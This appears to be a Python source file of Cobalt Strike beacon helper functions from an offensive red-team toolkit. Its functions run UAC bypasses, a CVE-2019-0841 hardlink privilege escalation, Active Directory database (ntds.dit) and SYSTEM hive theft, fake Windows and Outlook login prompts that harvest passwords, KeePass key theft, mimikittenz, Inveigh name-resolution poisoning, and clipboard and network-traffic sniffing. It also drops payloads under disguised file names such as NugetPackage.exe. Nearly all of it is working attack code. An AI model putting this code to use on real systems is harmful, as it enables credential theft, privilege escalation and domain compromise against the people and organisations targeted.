def elevate_token_shellcode_csharp(bid, shellcode):
    """
    Elevate with token duplication bypass. Execute `shellcode` with a C# helper.

    Imports FilelessUACBypass.ps1, uploads three files into the directory
    returned by `helpers.guess_temp` (the assembly runner, the shellcode
    runner and `shellcode` itself), runs Invoke-TokenDuplication against the
    shellcode runner, and finally removes all three uploaded files.
    """

    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    runner_exe = utils.basedir('tools/execute_shellcode.exe')
    assembly_exe = utils.basedir('tools/execute_assembly.exe')

    # Remote paths; guess_temp is consulted once per path, as before.
    assembly_dest = r'{}\NugetPackage.exe'.format(helpers.guess_temp(bid))
    runner_dest = r'{}\Stage2.exe'.format(helpers.guess_temp(bid))
    payload_dest = r'{}\nuget.package'.format(helpers.guess_temp(bid))

    uploads = (
        (assembly_exe, assembly_dest),
        (runner_exe, runner_dest),
        (shellcode, payload_dest),
    )
    for local_path, remote_path in uploads:
        helpers.upload_to(bid, local_path, remote_path)

    aggressor.bpowerpick(
        bid,
        'Invoke-TokenDuplication -Binary {}'.format(
            powershell_quote(runner_dest)))

    # Remove the dropped files in upload order.
    for remote_path in (assembly_dest, runner_dest, payload_dest):
        aggressor.brm(bid, remote_path)
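def run(bid, program, args=None, silent=False):
    """
    Run a registered `program` on beacon `bid`.

    `program` is looked up, in order, in the module-level `assemblies`,
    `powershell` and `callbacks` tables:

      - assemblies: `args` is passed through `helpers.eaq` and the assembly
        is executed with `bexecute_assembly` (a task message is shown unless
        `silent`).
      - powershell: the script is imported and `args` is run as the
        PowerShell command line via `bpowerpick`.
      - callbacks: the callable is invoked as `callback(bid, args, silent=silent)`.

    `args` may be a list/tuple of arguments or a ready-made string; a falsy
    value is treated as no arguments.

    Raises RuntimeError when `program` is in none of the tables.
    """
    if not args:
        args = []

    if program in assemblies:
        assembly = assemblies[program]
        args = helpers.eaq(args)

        if not silent:
            aggressor.btask(bid,
                            'Tasked beacon to run {} {}'.format(program, args))
        aggressor.bexecute_assembly(bid, assembly, args, silent=True)
    elif program in powershell:
        script = powershell[program]
        aggressor.bpowershell_import(bid, script)

        # Quote list-style arguments into one command line; a string is
        # taken to be a complete command line already.
        if isinstance(args, (list, tuple)):
            args = ' '.join(powershell_quote(args))

        # Previously `' '.join(args)` was applied to this string, which
        # inserted a space between every character of the command.
        aggressor.bpowerpick(bid, args)
    elif program in callbacks:
        callback = callbacks[program]
        callback(bid, args, silent=silent)
    else:
        raise RuntimeError('Unrecognized program: {}'.format(program))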
def import_network_recon(bid):
    """
    Import NetworkRecon.ps1 into the PowerShell session of beacon `bid`.
    """
    script_path = utils.basedir('powershell/NetworkRecon.ps1')
    aggressor.bpowershell_import(bid, script_path)
def import_domain_recon(bid):
    """
    Import DomainRecon.ps1 into the PowerShell session of beacon `bid`.
    """
    script_path = utils.basedir('powershell/DomainRecon.ps1')
    aggressor.bpowershell_import(bid, script_path)
def _(bid, runtime=99999, *args):
    """
    Import Inveigh.ps1 and start Invoke-Inveigh (LLMNR/NBNS, console output
    off) on beacon `bid`.

    `runtime` is forwarded as -RunTime; any further positional `args` are
    appended to the command line verbatim, without quoting. Because
    `runtime` sits before `*args`, the first extra positional always lands
    in `runtime`.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Inveigh/Inveigh.ps1'))

    extra = ' '.join(args)
    command = ("Invoke-Inveigh -ConsoleOutput N -RunTime {} -Tool 2 "
               "-LLMNR Y -NBNS Y -StatusOutput Y {}").format(runtime, extra)
    aggressor.bpowerpick(bid, command)
def elevate_slui_command(bid, command):
    """
    Elevate with slui bypass: import FilelessUACBypass.ps1 and run
    Invoke-SluiBypass with `command` (quoted via powershell_quote).
    """
    script_path = utils.basedir('modules/FilelessUACBypass.ps1')
    aggressor.bpowershell_import(bid, script_path)

    invocation = 'Invoke-SluiBypass -Command {}'.format(
        powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def _(bid):
    """
    Run the two KeePass helpers on beacon `bid`, in order: Find-KeePassconfig
    from KeePassconfig.ps1, then Get-KeePassDatabaseKey from KeeThief.ps1.
    Each script is imported right before its command is issued.
    """
    steps = (
        ('powershell/KeePassconfig.ps1', "Find-KeePassconfig"),
        ('powershell/KeeThief.ps1', "Get-KeePassDatabaseKey -Verbose"),
    )
    for script, command in steps:
        aggressor.bpowershell_import(bid, utils.basedir(script))
        aggressor.bpowerpick(bid, command)
def elevate_eventvwr_command(bid, command):
    """
    Elevate with eventvwr bypass: import Invoke-EventVwrBypass.ps1 and run
    Invoke-EventVwrBypass with `command` (quoted via powershell_quote).
    """
    script_path = utils.basedir('modules/Invoke-EventVwrBypass.ps1')
    aggressor.bpowershell_import(bid, script_path)

    invocation = 'Invoke-EventVwrBypass -Command {}'.format(
        powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def elevate_wscript_command(bid, command):
    """
    Elevate with wscript bypass: import Invoke-WScriptBypassUAC.ps1 and run
    Invoke-WScriptBypassUAC with `command` as its -payload (quoted via
    powershell_quote).
    """
    script_path = utils.basedir('modules/Invoke-WScriptBypassUAC.ps1')
    aggressor.bpowershell_import(bid, script_path)

    invocation = 'Invoke-WScriptBypassUAC -payload {}'.format(
        powershell_quote(command))
    aggressor.bpowerpick(bid, invocation)
def _(bid, out=None):
    """
    Import UserSPN.ps1 and run Get-AccountSPNs on beacon `bid`.

    When `out` is truthy the output is redirected with PowerShell `>` to
    that path (quoted via powershell_quote).
    """
    aggressor.bpowershell_import(bid, utils.basedir('powershell/UserSPN.ps1'))

    parts = ['Get-AccountSPNs']
    if out:
        parts.append('> {}'.format(powershell_quote(out)))

    aggressor.bpowerpick(bid, ' '.join(parts))
def elevate_cve_2019_0841(bid, target, overwrite=None):
    r"""
    Elevate with CVE-2019-0841. Change permissions of 'target'. Optionally
    overwrite 'target' with 'overwrite'.

    Good overwrite options:
      - C:\Program Files\LAPS\CSE\AdmPwd.dll (then run gpupdate)
      - C:\Program Files (x86)\Google\Update\1.3.34.7\psmachine.dll (then wait for google update or run it manually)

    The PowerShell below stops Edge, replaces Edge's settings.dat with a
    hardlink to 'target' (Native-HardLink.ps1), starts Edge and stops it
    again, then prints the ACL of 'target'. 'target' is passed through
    powershell_quote; the doubled braces in the template are str.format
    escapes for literal PowerShell braces. Both beacon tasks are issued
    with silent=True.
    """

    native_hardlink_ps1 = utils.basedir('powershell/Native-HardLink.ps1')
    # Wildcard package directory; resolved on the beacon host by Resolve-Path.
    edge_dir = r'$env:localappdata\Packages\Microsoft.MicrosoftEdge_*'
    settings_dat = r'\Settings\settings.dat'

    command = helpers.code_string(r"""
        # Stop Edge
        echo "[.] Stopping Edge"
        $process = Get-Process -Name MicrosoftEdge 2>$null
        if ($process) {{
            $process | Stop-Process
        }}
        sleep 3
        
        # Hardlink
        $edge_dir = Resolve-Path {edge_dir}
        $settings_dat = $edge_dir.Path + '{settings_dat}'
        echo "[.] Making Hardlink from $settings_dat to {target}"
        rm $settings_dat
        Native-HardLink -Verbose -Link $settings_dat -Target {target}
        
        # Start Edge
        echo "[.] Starting Edge"
        Start Microsoft-Edge:
        sleep 3
        
        # Stop it again
        echo "[.] Stopping Edge"
        $process = Get-Process -Name MicrosoftEdge 2>$null
        if ($process) {{
            $process | Stop-Process
        }}

        echo "[+] All Finished!"
        echo "[.] New ACLs:"
        Get-Acl {target} | Format-List
        """.format(edge_dir=edge_dir,
                   settings_dat=settings_dat,
                   target=powershell_quote(target)))

    aggressor.bpowershell_import(bid, native_hardlink_ps1, silent=True)
    aggressor.bpowerpick(bid, command, silent=True)

    # Optional second step: upload `overwrite` over `target`, then call
    # helpers.explorer_stomp on it (what explorer_stomp does is not visible
    # here).
    if overwrite:
        helpers.upload_to(bid, overwrite, target)
        helpers.explorer_stomp(bid, target)
def _(bid, *ranges):
    """
    Import Invoke-ReverseDnsLookup.ps1 and run it once per entry in
    `ranges` on beacon `bid`; the calls are sent as one multi-line command.
    Entries are interpolated without quoting.
    """
    aggressor.bpowershell_import(
        bid,
        utils.basedir(
            'powershell/PowerSploit/Recon/Invoke-ReverseDnsLookup.ps1'))

    lines = ['Invoke-ReverseDnsLookup {}\n'.format(ip_range)
             for ip_range in ranges]
    aggressor.bpowerpick(bid, ''.join(lines))
def _(bid, runtime=99999, *args):
    """
    Import Inveigh.ps1 and start Invoke-Inveigh (LLMNR/NBNS) on beacon
    `bid` with file output under the user's AppData\\Roaming\\Microsoft.

    `runtime` is forwarded as -RunTime; any further positional `args` are
    appended verbatim, without quoting. Because `runtime` precedes `*args`,
    the first extra positional always lands in `runtime`.
    """
    script_path = utils.basedir('powershell/Inveigh/Inveigh.ps1')
    aggressor.bpowershell_import(bid, script_path)

    aggressor.btask(
        bid,
        'Tasked beacon to run inveigh with output files at %userprofile%\\AppData\\Roaming\\Microsoft'
    )

    template = (r"Invoke-Inveigh -FileOutput Y -FileOutputDirectory "
                r"$env:userprofile\AppData\Roaming\Microsoft -RunTime {} "
                r"-Tool 2 -LLMNR Y -NBNS Y -StatusOutput Y {}")
    aggressor.bpowerpick(bid, template.format(runtime, ' '.join(args)))
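def _(bid,
      title='Windows Security',
      message='Please re-enter your user credentials.'):
    """
    Import Invoke-LoginPrompt.ps1 and show a prompt on beacon `bid` built
    from `title` and `message`; whatever ShowPrompt returns is echoed,
    otherwise "Didn't get the credentials" is echoed.

    `title` and `message` are interpolated inside double quotes without
    escaping, so a double quote in either would break the script.
    """
    aggressor.bpowershell_import(
        bid, utils.basedir('powershell/Invoke-LoginPrompt.ps1'))

    # `command` was previously built with `+=` before ever being assigned,
    # which raised UnboundLocalError; assign it directly instead.
    command = helpers.code_string(r"""
	$out = ShowPrompt "{}" "{}"
	if ($out) {{
	    $out
	}} else {{
	    echo "Didn't get the credentials"
	}}
	""".format(title, message))

    # powerpick doesn't work with $host.ui
    aggressor.bpowershell(bid, command, silent=True)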
def _(bid):
    r"""
    Import Invoke-NinjaCopy.ps1 on beacon `bid`, copy ntds.dit and the
    SYSTEM registry hive into C:\Windows\temp, and log the destination
    paths with blog2.
    """
    copies = (
        (r'C:\Windows\ntds\ntds.dit', r'C:\Windows\temp\ntds.dit'),
        (r'C:\Windows\system32\config\SYSTEM', r'C:\Windows\temp\SYSTEM'),
    )

    aggressor.bpowershell_import(
        bid,
        utils.basedir(
            'powershell/PowerSploit/Exfiltration/Invoke-NinjaCopy.ps1'))

    (ntds_src, ntds_dst), (system_src, system_dst) = copies
    command = helpers.code_string(r"""
	Invoke-NinjaCopy -Path "{}" -LocalDestination "{}"
	Invoke-NinjaCopy -Path "{}" -LocalDestination "{}"
	""".format(ntds_src, ntds_dst, system_src, system_dst))

    aggressor.bpowerpick(bid, command)
    aggressor.blog2(
        bid, 'Files will be at "{}" and "{}"'.format(ntds_dst, system_dst))
def elevate_token_command(bid, command, *other_args):
    """
    Elevate with token duplication bypass. Execute `command`: its first
    whitespace-separated token is passed as -Binary and the remaining
    tokens, joined by spaces, as -Arguments (both quoted via
    powershell_quote). Any `other_args` are appended to the
    Invoke-TokenDuplication call verbatim.

    Note: `command` is split on whitespace, so a binary path containing a
    space is cut at the first space.
    """
    binary, *arguments = command.split()

    aggressor.bpowershell_import(
        bid, utils.basedir('modules/FilelessUACBypass.ps1'))

    pieces = ['Invoke-TokenDuplication -Binary {} '.format(
        powershell_quote(binary))]

    if arguments:
        pieces.append('-Arguments {} '.format(
            powershell_quote(' '.join(arguments))))

    if other_args:
        pieces.append(' '.join(other_args))

    aggressor.bpowerpick(bid, ''.join(pieces))
def _(
    bid,
    title='Microsoft Outlook',
    message='Your Outlook session has expired. Please re-enter your credentials.'
):
    """
    Import Invoke-LoginPrompt.ps1, stop OUTLOOK, and show a prompt on
    beacon `bid` built from `title` and `message`. If ShowPrompt returns
    something it is echoed and outlook is started again; otherwise
    "Didn't get the credentials" is echoed. Sent via bpowershell because
    powerpick doesn't work with $host.ui.
    """
    script_path = utils.basedir('powershell/Invoke-LoginPrompt.ps1')
    aggressor.bpowershell_import(bid, script_path)

    prompt_template = r"""
	Stop-Process -Name OUTLOOK
	$out = ShowPrompt "{}" "{}"
	if ($out) {{
	    $out
	    Start-Process outlook
	}} else {{
	    echo "Didn't get the credentials"
	}}
	"""
    command = helpers.code_string(prompt_template.format(title, message))

    aggressor.bpowershell(bid, command, silent=True)
def _(bid):
    """
    Import Inveigh.ps1 and issue Stop-Inveigh on beacon `bid`.
    """
    script_path = utils.basedir('powershell/Inveigh/Inveigh.ps1')
    aggressor.bpowershell_import(bid, script_path)
    aggressor.bpowerpick(bid, 'Stop-Inveigh')
def _(bid):
    """
    Import Invoke-mimikittenz.ps1 and run Invoke-mimikittenz on beacon `bid`.
    """
    script_path = utils.basedir("powershell/Invoke-mimikittenz.ps1")
    aggressor.bpowershell_import(bid, script_path)
    aggressor.bpowerpick(bid, "Invoke-mimikittenz")
def _(bid, *args):
    """
    Import Start-ClipboardMonitor.ps1 and run Start-ClipboardMonitor on
    beacon `bid`, passing `args` quoted via powershell_quote.
    """
    script_path = utils.basedir('powershell/Start-ClipboardMonitor.ps1')
    aggressor.bpowershell_import(bid, script_path)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Start-ClipboardMonitor {}'.format(quoted_args))
def import_host_recon(bid):
    """
    Import HostRecon.ps1 into the PowerShell session of beacon `bid`.
    """
    script_path = utils.basedir('powershell/HostRecon.ps1')
    aggressor.bpowershell_import(bid, script_path)
def import_script(bid, program):
    """
    Import the PowerShell script registered under `program` (in the
    module-level `powershell` table) into beacon `bid`.

    Raises RuntimeError when `program` is not a key of `powershell`.
    """
    if program not in powershell:
        raise RuntimeError('Not a known script: {}'.format(program))

    aggressor.bpowershell_import(bid, powershell[program])
def _(bid):
    """
    Import Invoke-CredLeak.ps1 and run Invoke-CredLeak on beacon `bid`.
    """
    script_path = utils.basedir('powershell/Invoke-CredLeak.ps1')
    aggressor.bpowershell_import(bid, script_path)
    aggressor.bpowerpick(bid, 'Invoke-CredLeak')
def _(bid, *args):
    """
    Import SessionGopher.ps1 and run Invoke-SessionGopher on beacon `bid`,
    passing `args` quoted via powershell_quote.
    """
    script_path = utils.basedir('powershell/SessionGopher.ps1')
    aggressor.bpowershell_import(bid, script_path)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(bid, 'Invoke-SessionGopher {}'.format(quoted_args))
def import_av_logs(bid):
    """
    Import AVLogs.ps1 into the PowerShell session of beacon `bid`.
    """
    script_path = utils.basedir('powershell/AVLogs.ps1')
    aggressor.bpowershell_import(bid, script_path)
def _(bid, *args):
    r"""
    Import Invoke-NetRipper.ps1 and run Invoke-NetRipper on beacon `bid`
    with -LogLocation C:\Temp\, followed by `args` quoted via
    powershell_quote.
    """
    script_path = utils.basedir('powershell/Invoke-NetRipper.ps1')
    aggressor.bpowershell_import(bid, script_path)

    quoted_args = ' '.join(powershell_quote(args))
    aggressor.bpowerpick(
        bid, r'Invoke-NetRipper -LogLocation C:\Temp\ {}'.format(quoted_args))